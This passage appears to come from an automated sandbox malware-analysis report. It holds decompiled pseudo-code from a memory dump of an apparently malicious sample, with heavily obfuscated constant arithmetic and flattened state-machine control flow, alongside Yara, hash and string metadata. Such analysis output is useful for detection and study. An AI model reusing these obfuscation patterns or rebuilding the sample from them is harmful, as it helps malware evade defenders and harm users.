                                          				_v652 = _v652 ^ 0x03efb4d1;
                                          				_v608 = 0xe223;
                                          				_t261 = 0x3f;
                                          				_v608 = _v608 / _t261;
                                          				_v608 = _v608 ^ 0x000070cc;
                                          				_v656 = 0xb48f;
                                          				_v656 = _v656 >> 6;
                                          				_t262 = 0x3a;
                                          				_v656 = _v656 / _t262;
                                          				_v656 = _v656 + 0xde3a;
                                          				_v656 = _v656 ^ 0x0000cbaf;
                                          				_v612 = 0x15cc;
                                          				_v612 = _v612 ^ 0x9ca6d169;
                                          				_v612 = _v612 ^ 0x9ca6af9c;
                                          				_v668 = 0xa8de;
                                          				_v668 = _v668 << 5;
                                          				_v668 = _v668 + 0xffff49ed;
                                          				_t263 = 0x34;
                                          				_v668 = _v668 / _t263;
                                          				_v668 = _v668 ^ 0x00000193;
                                          				_v596 = 0xe25b;
                                          				_v596 = _v596 >> 4;
                                          				_v596 = _v596 ^ 0x000030c3;
                                          				_v636 = 0xc7ea;
                                          				_v636 = _v636 << 0xa;
                                          				_v636 = _v636 | 0x82c54243;
                                          				_v636 = _v636 ^ 0x83dfaf9b;
                                          				_v620 = 0x2a3e;
                                          				_v620 = _v620 + 0xffff612f;
                                          				_v620 = _v620 ^ 0xffffe842;
                                          				_v644 = 0x52e;
                                          				_t264 = 0x44;
                                          				_v644 = _v644 * 0x2b;
                                          				_v644 = _v644 + 0x1b45;
                                          				_v644 = _v644 ^ 0x0000a38b;
                                          				_v664 = 0x7c05;
                                          				_v664 = _v664 / _t264;
                                          				_v664 = _v664 + 0xfffff3de;
                                          				_t265 = 0xd;
                                          				_v664 = _v664 * 0x41;
                                          				_v664 = _v664 ^ 0xfffd1fed;
                                          				_v672 = 0x7153;
                                          				_v672 = _v672 * 0x55;
                                          				_v672 = _v672 + 0xffff3073;
                                          				_v672 = _v672 | 0x19b2f735;
                                          				_v672 = _v672 ^ 0x19b69e67;
                                          				_v624 = 0x6a46;
                                          				_v624 = _v624 << 6;
                                          				_v624 = _v624 ^ 0x001a8e62;
                                          				_v676 = 0x6586;
                                          				_v676 = _v676 | 0x5a6bf539;
                                          				_v676 = _v676 / _t265;
                                          				_v676 = _v676 << 0xf;
                                          				_v676 = _v676 ^ 0x4e5fab63;
                                          				_v632 = 0x1a9f;
                                          				_v632 = _v632 + 0x62a3;
                                          				_v632 = _v632 ^ 0x000002a8;
                                          				_v616 = 0x8464;
                                          				_v616 = _v616 | 0x13bf265e;
                                          				_v616 = _v616 ^ 0x13bfdd6d;
                                          				_v592 = 0xbadb;
                                          				_t266 = 0x3d;
                                          				_t292 = _v632;
                                          				_v592 = _v592 * 0x69;
                                          				_v592 = _v592 ^ 0x004cce95;
                                          				_v604 = 0xca90;
                                          				_v604 = _v604 >> 0xc;
                                          				_v604 = _v604 ^ 0x00007684;
                                          				_v648 = 0x358b;
                                          				_v648 = _v648 << 1;
                                          				_v648 = _v648 << 9;
                                          				_v648 = _v648 / _t266;
                                          				_v648 = _v648 ^ 0x0003f328;
                                          				_v600 = 0xe7dd;
                                          				_v600 = _v600 ^ 0xaf509c9e;
                                          				_v600 = _v600 ^ 0xaf5010b9;
                                          				_v628 = 0xd224;
                                          				_t245 = _v628;
                                          				_t267 = 0x19;
                                          				_t290 = _t245 % _t267;
                                          				_v628 = _t245 / _t267;
                                          				_v628 = _v628 ^ 0x00000864;
                                          				do {
                                          					while(_t293 != 0x47bbe06) {
                                          						if(_t293 == 0xa25cde4) {
                                          							_t249 = E006CF46D();
                                          							_t298 = _v588 - _v548;
                                          							asm("sbb ecx, [esp+0x94]");
                                          							__eflags = _v584 - _t290;
                                          							if(__eflags >= 0) {
                                          								if(__eflags > 0) {
                                          									L19:
                                          									_t256 = 1;
                                          									__eflags = 1;
                                          								} else {
                                          									__eflags = _t298 - _t249;
                                          									if(_t298 >= _t249) {
                                          										goto L19;
                                          									}
                                          								}
                                          							}
                                          						} else {
                                          							if(_t293 == 0x13363d5d) {
                                          								_t290 = _v604;
                                          								_t267 = _v592;
                                          								E006DAAAE(_t267, _t290, _v648,  &_v588, _v600);
                                          								_t300 =  &(_t300[3]);
                                          								_t293 = 0xa25cde4;
                                          								continue;
                                          							} else {
                                          								if(_t293 == 0x1fdc46de) {
                                          									_t290 = _v660;
                                          									_t254 = E006CB566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
                                          									_t292 = _t254;
                                          									_t300 =  &(_t300[0xc]);
                                          									__eflags = _t254 - 0xffffffff;
                                          									if(__eflags != 0) {
                                          										_t293 = 0x47bbe06;
                                          										continue;
                                          									}
                                          								} else {
                                          									if(_t293 == 0x350fffd6) {
                                          										_t290 =  &_v524;
                                          										_t255 = E006D3E3F(_t267, _t290, __eflags, _v652, _v608);
                                          										_pop(_t267);
                                          										__eflags = _t255;
                                          										if(__eflags != 0) {
                                          											_t293 = 0x1fdc46de;
                                          											continue;
                                          										}
                                          									} else {
                                          										if(_t293 != 0x3b419076) {
                                          											goto L14;
                                          										} else {
                                          											_t293 = 0x350fffd6;
                                          											continue;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L20:
                                          						return _t256;
                                          					}
                                          					_push(_t267);
                                          					_t247 = E006C7F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
                                          					_t290 = _v616;
                                          					_t267 = _v632;
                                          					asm("sbb esi, esi");
                                          					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
                                          					__eflags = _t293;
                                          					E006D4F7D(_t267, _t290, _t292); // executed
                                          					_t300 =  &(_t300[7]);
                                          					L14:
                                          					__eflags = _t293 - 0x2fc5a10a;
                                          				} while (__eflags != 0);
                                          				goto L20;
                                          			}






















































                                          0x006d02c3
                                          0x006d02c9
                                          0x006d02d3
                                          0x006d02db
                                          0x006d02e9
                                          0x006d02ea
                                          0x006d02ec
                                          0x006d02f1
                                          0x006d02f5
                                          0x006d0305
                                          0x006d030b
                                          0x006d0313
                                          0x006d031b
                                          0x006d0323
                                          0x006d0328
                                          0x006d0334
                                          0x006d0339
                                          0x006d033f
                                          0x006d0347
                                          0x006d034f
                                          0x006d0354
                                          0x006d0360
                                          0x006d0365
                                          0x006d036b
                                          0x006d0373
                                          0x006d037f
                                          0x006d0384
                                          0x006d038a
                                          0x006d0392
                                          0x006d039a
                                          0x006d03a3
                                          0x006d03a8
                                          0x006d03ae
                                          0x006d03b6
                                          0x006d03be
                                          0x006d03c6
                                          0x006d03ce
                                          0x006d03d6
                                          0x006d03de
                                          0x006d03e3
                                          0x006d03ef
                                          0x006d03f2
                                          0x006d03f6
                                          0x006d03fe
                                          0x006d0406
                                          0x006d040b
                                          0x006d0413
                                          0x006d041b
                                          0x006d0420
                                          0x006d0428
                                          0x006d0430
                                          0x006d0438
                                          0x006d0440
                                          0x006d0448
                                          0x006d0459
                                          0x006d0461
                                          0x006d0465
                                          0x006d046d
                                          0x006d0475
                                          0x006d0485
                                          0x006d0489
                                          0x006d0496
                                          0x006d0499
                                          0x006d049d
                                          0x006d04a5
                                          0x006d04b2
                                          0x006d04b6
                                          0x006d04be
                                          0x006d04c6
                                          0x006d04ce
                                          0x006d04d6
                                          0x006d04db
                                          0x006d04e3
                                          0x006d04eb
                                          0x006d04fb
                                          0x006d04ff
                                          0x006d0504
                                          0x006d050c
                                          0x006d0514
                                          0x006d051c
                                          0x006d0524
                                          0x006d052c
                                          0x006d0534
                                          0x006d053c
                                          0x006d0549
                                          0x006d054c
                                          0x006d0550
                                          0x006d0554
                                          0x006d055c
                                          0x006d0564
                                          0x006d0569
                                          0x006d0571
                                          0x006d0579
                                          0x006d057d
                                          0x006d058a
                                          0x006d058e
                                          0x006d0596
                                          0x006d059e
                                          0x006d05a6
                                          0x006d05ae
                                          0x006d05b6
                                          0x006d05ba
                                          0x006d05bb
                                          0x006d05bd
                                          0x006d05c1
                                          0x006d05c9
                                          0x006d05c9
                                          0x006d05d7
                                          0x006d06f4
                                          0x006d06fd
                                          0x006d0708
                                          0x006d070f
                                          0x006d0711
                                          0x006d0713
                                          0x006d0719
                                          0x006d071b
                                          0x006d071b
                                          0x006d0715
                                          0x006d0715
                                          0x006d0717
                                          0x00000000
                                          0x00000000
                                          0x006d0717
                                          0x006d0713
                                          0x006d05dd
                                          0x006d05e3
                                          0x006d068a
                                          0x006d068e
                                          0x006d0692
                                          0x006d0697
                                          0x006d069a
                                          0x00000000
                                          0x006d05e9
                                          0x006d05ef
                                          0x006d065f
                                          0x006d0663
                                          0x006d0668
                                          0x006d066a
                                          0x006d066d
                                          0x006d0670
                                          0x006d0676
                                          0x00000000
                                          0x006d0676
                                          0x006d05f1
                                          0x006d05f7
                                          0x006d0610
                                          0x006d061b
                                          0x006d0621
                                          0x006d0622
                                          0x006d0624
                                          0x006d062a
                                          0x00000000
                                          0x006d062a
                                          0x006d05f9
                                          0x006d05ff
                                          0x00000000
                                          0x006d0605
                                          0x006d0605
                                          0x00000000
                                          0x006d0605
                                          0x006d05ff
                                          0x006d05f7
                                          0x006d05ef
                                          0x006d05e3
                                          0x006d071f
                                          0x006d0728
                                          0x006d0728
                                          0x006d06a4
                                          0x006d06be
                                          0x006d06c3
                                          0x006d06c9
                                          0x006d06d0
                                          0x006d06d8
                                          0x006d06d8
                                          0x006d06de
                                          0x006d06e3
                                          0x006d06e6
                                          0x006d06e6
                                          0x006d06e6
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: #,'$#$Fj$Sq$[$u^
                                          • API String ID: 0-3347335214
                                          • Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                          • Instruction ID: 28b991ba3b30d8ac39a0699839827a17a2ce61da6ca9e6b18e4e481cf417d283
                                          • Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                          • Instruction Fuzzy Hash: 09B164729083819FE358CF64C98954BFBE2FBC5758F008A1EF085562A0D7B59A09CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E006CEE78() {
                                          				char _v520;
                                          				char _v1040;
                                          				intOrPtr _v1044;
                                          				intOrPtr _v1048;
                                          				intOrPtr _v1052;
                                          				intOrPtr _v1056;
                                          				signed int _v1060;
                                          				signed int _v1064;
                                          				signed int _v1068;
                                          				signed int _v1072;
                                          				signed int _v1076;
                                          				signed int _v1080;
                                          				signed int _v1084;
                                          				signed int _v1088;
                                          				signed int _v1092;
                                          				signed int _v1096;
                                          				signed int _v1100;
                                          				signed int _v1104;
                                          				signed int _v1108;
                                          				signed int _v1112;
                                          				signed int _v1116;
                                          				signed int _v1120;
                                          				signed int _v1124;
                                          				void* _t204;
                                          				void* _t216;
                                          				void* _t218;
                                          				intOrPtr _t242;
                                          				intOrPtr _t248;
                                          				signed int _t249;
                                          				signed int _t250;
                                          				signed int _t251;
                                          				signed int _t252;
                                          				signed int _t253;
                                          				signed int _t254;
                                          				signed int* _t257;
                                          
                                          				_t257 =  &_v1124;
                                          				_v1056 = 0x181c5d;
                                          				_v1052 = 0x367784;
                                          				_t216 = 0x1144238d;
                                          				_v1048 = 0x4ffcf6;
                                          				_t248 = 0;
                                          				_v1044 = 0;
                                          				_v1088 = 0xda27;
                                          				_t249 = 0x62;
                                          				_v1088 = _v1088 * 0x3a;
                                          				_t250 = 0x7a;
                                          				_v1088 = _v1088 / _t249;
                                          				_v1088 = _v1088 ^ 0x0000d2a1;
                                          				_v1112 = 0x1719;
                                          				_v1112 = _v1112 << 7;
                                          				_v1112 = _v1112 + 0xffff2bf1;
                                          				_v1112 = _v1112 | 0x98c770ba;
                                          				_v1112 = _v1112 ^ 0x98cfba04;
                                          				_v1096 = 0xeee5;
                                          				_v1096 = _v1096 ^ 0xe08a058d;
                                          				_v1096 = _v1096 | 0xf31efd60;
                                          				_v1096 = _v1096 >> 0xd;
                                          				_v1096 = _v1096 ^ 0x00079e87;
                                          				_v1068 = 0x925f;
                                          				_v1068 = _v1068 + 0xa627;
                                          				_v1068 = _v1068 * 0xc;
                                          				_v1068 = _v1068 ^ 0x000ee055;
                                          				_v1076 = 0x1457;
                                          				_v1076 = _v1076 * 0x3c;
                                          				_t251 = 0x32;
                                          				_v1076 = _v1076 / _t250;
                                          				_v1076 = _v1076 ^ 0x00007f2a;
                                          				_v1064 = 0x70c;
                                          				_v1064 = _v1064 * 3;
                                          				_v1064 = _v1064 ^ 0x000033a7;
                                          				_v1080 = 0xbf13;
                                          				_v1080 = _v1080 >> 0xf;
                                          				_v1080 = _v1080 | 0xa6e1d279;
                                          				_v1080 = _v1080 ^ 0xa6e18774;
                                          				_v1072 = 0x855;
                                          				_v1072 = _v1072 >> 6;
                                          				_v1072 = _v1072 * 0x6d;
                                          				_v1072 = _v1072 ^ 0x00004ced;
                                          				_v1060 = 0x8e6f;
                                          				_v1060 = _v1060 + 0xe76;
                                          				_v1060 = _v1060 ^ 0x0000eeed;
                                          				_v1116 = 0x7f13;
                                          				_v1116 = _v1116 + 0x7bf9;
                                          				_v1116 = _v1116 + 0xffffe522;
                                          				_v1116 = _v1116 + 0x76b9;
                                          				_v1116 = _v1116 ^ 0x000120a7;
                                          				_v1124 = 0x4a8d;
                                          				_v1124 = _v1124 + 0xb0fa;
                                          				_t252 = 0x18;
                                          				_v1124 = _v1124 / _t251;
                                          				_v1124 = _v1124 ^ 0xe1689f92;
                                          				_v1124 = _v1124 ^ 0xe168b829;
                                          				_v1104 = 0x6fdc;
                                          				_v1104 = _v1104 / _t252;
                                          				_v1104 = _v1104 ^ 0xd1a01b12;
                                          				_v1104 = _v1104 >> 0xd;
                                          				_v1104 = _v1104 ^ 0x0006b7bc;
                                          				_v1120 = 0x3441;
                                          				_v1120 = _v1120 << 2;
                                          				_v1120 = _v1120 | 0xb521b1d3;
                                          				_v1120 = _v1120 ^ 0x6f352f49;
                                          				_v1120 = _v1120 ^ 0xda14a570;
                                          				_v1092 = 0xdaef;
                                          				_v1092 = _v1092 + 0xffffef8f;
                                          				_v1092 = _v1092 | 0x558b4159;
                                          				_v1092 = _v1092 >> 0xb;
                                          				_v1092 = _v1092 ^ 0x000a96bc;
                                          				_v1084 = 0x9e65;
                                          				_v1084 = _v1084 ^ 0xd37ef8f9;
                                          				_t253 = 0x14;
                                          				_v1084 = _v1084 / _t253;
                                          				_v1084 = _v1084 ^ 0x0a9307fe;
                                          				_v1100 = 0x36e3;
                                          				_v1100 = _v1100 + 0xffff4219;
                                          				_v1100 = _v1100 | 0x679c7357;
                                          				_t254 = 0x3e;
                                          				_v1100 = _v1100 * 0x7e;
                                          				_v1100 = _v1100 ^ 0xffbf63c1;
                                          				_v1108 = 0x25e;
                                          				_v1108 = _v1108 / _t254;
                                          				_v1108 = _v1108 | 0x82073b90;
                                          				_v1108 = _v1108 * 0x30;
                                          				_v1108 = _v1108 ^ 0x615b4461;
                                          				do {
                                          					while(_t216 != 0x295ca1) {
                                          						if(_t216 == 0x1144238d) {
                                          							_t216 = 0x274f9b22;
                                          							continue;
                                          						} else {
                                          							if(_t216 == 0x1718f041) {
                                          								E006CC0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
                                          							} else {
                                          								if(_t216 == 0x274f9b22) {
                                          									E006D3E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
                                          									_t216 = 0x295ca1;
                                          									continue;
                                          								} else {
                                          									_t264 = _t216 - 0x3691f983;
                                          									if(_t216 != 0x3691f983) {
                                          										goto L10;
                                          									} else {
                                          										_push( &_v1040);
                                          										_push( &_v520);
                                          										E006C7B63(_v1104, _v1120, _t264);
                                          										_t248 =  !=  ? 1 : _t248;
                                          										_t216 = 0x1718f041;
                                          										continue;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L13:
                                          						return _t248;
                                          					}
                                          					_push(_v1068);
                                          					_t204 = E006D889D(0x6dc9b0, _v1096, __eflags);
                                          					_pop(_t218);
                                          					_t242 =  *0x6dca2c; // 0x248300
                                          					_t176 = _t242 + 0x230; // 0x710050
                                          					E006CC680(_t176, _v1064, _v1080, _t218, _v1072,  *0x6dca2c, _t204,  &_v1040);
                                          					E006D2025(_v1060, _t204, _v1116, _v1124);
                                          					_t257 =  &(_t257[9]);
                                          					_t216 = 0x3691f983;
                                          					L10:
                                          					__eflags = _t216 - 0x16e30c37;
                                          				} while (__eflags != 0);
                                          				goto L13;
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: I/5o$aD[a$6$L
                                          • API String ID: 0-1330720659
                                          • Opcode ID: c675e1889697b79d7275c3a799d82b9da0cdf6149f4cbe4273e2de7f7b231e66
                                          • Instruction ID: 410cd8913a18c41076ce12936e9ff13a1295b53abcd1485362e74e549bfe18f7
                                          • Opcode Fuzzy Hash: c675e1889697b79d7275c3a799d82b9da0cdf6149f4cbe4273e2de7f7b231e66
                                          • Instruction Fuzzy Hash: A29120715083819FD358CF65C48991BBBF6FBC5358F10892EF19696260D3BA8A09CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E006C7B63(void* __ecx, void* __edx, void* __eflags) {
                                          				void* _t227;
                                          				signed int _t253;
                                          				signed int _t257;
                                          				signed int _t258;
                                          				void* _t279;
                                          				void* _t280;
                                          
                                          				_t279 = _t280 - 0x70;
                                          				_push( *((intOrPtr*)(_t279 + 0x7c)));
                                          				_push( *((intOrPtr*)(_t279 + 0x78)));
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t227);
                                          				 *(_t279 + 0x5c) = 0x4f49;
                                          				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
                                          				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
                                          				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
                                          				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
                                          				 *(_t279 + 0x20) = 0x2d3b;
                                          				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
                                          				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
                                          				 *(_t279 + 0x38) = 0xada;
                                          				_t257 = 0x56;
                                          				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
                                          				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
                                          				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
                                          				 *(_t279 + 0x44) = 0x9fd0;
                                          				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
                                          				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
                                          				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
                                          				 *(_t279 + 0x28) = 0xbdd8;
                                          				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
                                          				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
                                          				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
                                          				 *(_t279 + 0x24) = 0xa469;
                                          				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
                                          				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
                                          				 *(_t279 + 0x48) = 0xdd17;
                                          				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
                                          				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
                                          				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
                                          				 *(_t279 + 0x3c) = 0x840;
                                          				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
                                          				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
                                          				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
                                          				 *(_t279 + 0x34) = 0xe245;
                                          				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
                                          				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
                                          				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
                                          				 *(_t279 + 0x68) = 0x7c59;
                                          				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
                                          				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
                                          				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
                                          				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
                                          				 *(_t279 + 0x1c) = 0x17b0;
                                          				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
                                          				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
                                          				 *(_t279 + 0xc) = 0x52de;
                                          				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
                                          				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
                                          				 *(_t279 + 0x14) = 0xa04a;
                                          				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
                                          				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
                                          				 *(_t279 + 0x10) = 0x88b9;
                                          				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
                                          				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
                                          				 *(_t279 + 0x58) = 0x8451;
                                          				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
                                          				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
                                          				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
                                          				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
                                          				 *(_t279 + 0x2c) = 0xa221;
                                          				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
                                          				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
                                          				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
                                          				 *(_t279 + 0x6c) = 0xb834;
                                          				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
                                          				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
                                          				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
                                          				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
                                          				 *(_t279 + 0x60) = 0x6d71;
                                          				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
                                          				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
                                          				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
                                          				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
                                          				 *(_t279 + 0x40) = 0xcc9d;
                                          				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
                                          				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
                                          				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
                                          				 *(_t279 + 0x50) = 0xea3;
                                          				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
                                          				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
                                          				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
                                          				 *(_t279 + 0x64) = 0xe156;
                                          				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
                                          				_t258 = 0x77;
                                          				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
                                          				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
                                          				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
                                          				 *(_t279 + 0x54) = 0xb949;
                                          				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
                                          				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
                                          				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
                                          				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
                                          				 *(_t279 + 0x4c) = 0x8c7e;
                                          				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
                                          				_t171 = _t279 - 0x14; // 0x68cf93e9
                                          				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
                                          				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
                                          				 *(_t279 + 0x30) = 0x8a4e;
                                          				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
                                          				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
                                          				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
                                          				 *(_t279 + 0x18) = 0x537b;
                                          				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
                                          				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
                                          				E006D93A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
                                          				_t193 = _t279 - 0x21c; // 0x68cf91e1
                                          				E006D93A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
                                          				_t198 = _t279 - 0x424; // 0x68cf8fd9
                                          				E006D93A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
                                          				_t202 = _t279 - 0x21c; // 0x68cf91e1
                                          				E006C6636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
                                          				_t208 = _t279 - 0x424; // 0x68cf8fd9
                                          				E006C6636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
                                          				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
                                          				_t214 = _t279 - 0x14; // 0x68cf93e9
                                          				_t215 = _t279 - 0x21c; // 0x68cf91e1
                                          				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
                                          				_t217 = _t279 - 0x424; // 0x68cf8fd9
                                          				 *((intOrPtr*)(_t279 - 8)) = _t217;
                                          				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
                                          				_t253 = E006D7BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
                                          				asm("sbb eax, eax");
                                          				return  ~_t253 + 1;
                                          			}










                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID: 6S5q$f''e
                                          • API String ID: 3080627654-2864536462
                                          • Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                          • Instruction ID: 82e0aaf1cf94f24ce9ead82849d71c6c31b9d4531c534c4c1b2f12fc3b0ac386
                                          • Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                          • Instruction Fuzzy Hash: DAA1CDB140138D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D3BAD959CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E006CB41F(signed int __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _t91;
                                          				signed int* _t93;
                                          				intOrPtr _t95;
                                          				signed int _t103;
                                          				signed int _t104;
                                          
                                          				_v44 = _v44 & 0x00000000;
                                          				_v48 = 0x783c80;
                                          				_v8 = 0x978d;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 | 0x918d7e28;
                                          				_v8 = _v8 ^ 0x918d7bef;
                                          				_v28 = 0x8ae6;
                                          				_v28 = _v28 + 0xffff2048;
                                          				_v28 = _v28 ^ 0xfffff0f4;
                                          				_v40 = 0x90b0;
                                          				_v40 = _v40 + 0x186c;
                                          				_v40 = _v40 ^ 0x0000e60c;
                                          				_v12 = 0x4bc7;
                                          				_t103 = __edx;
                                          				_v12 = _v12 * 0x77;
                                          				_v12 = _v12 >> 8;
                                          				_v12 = _v12 << 3;
                                          				_v12 = _v12 ^ 0x000165a0;
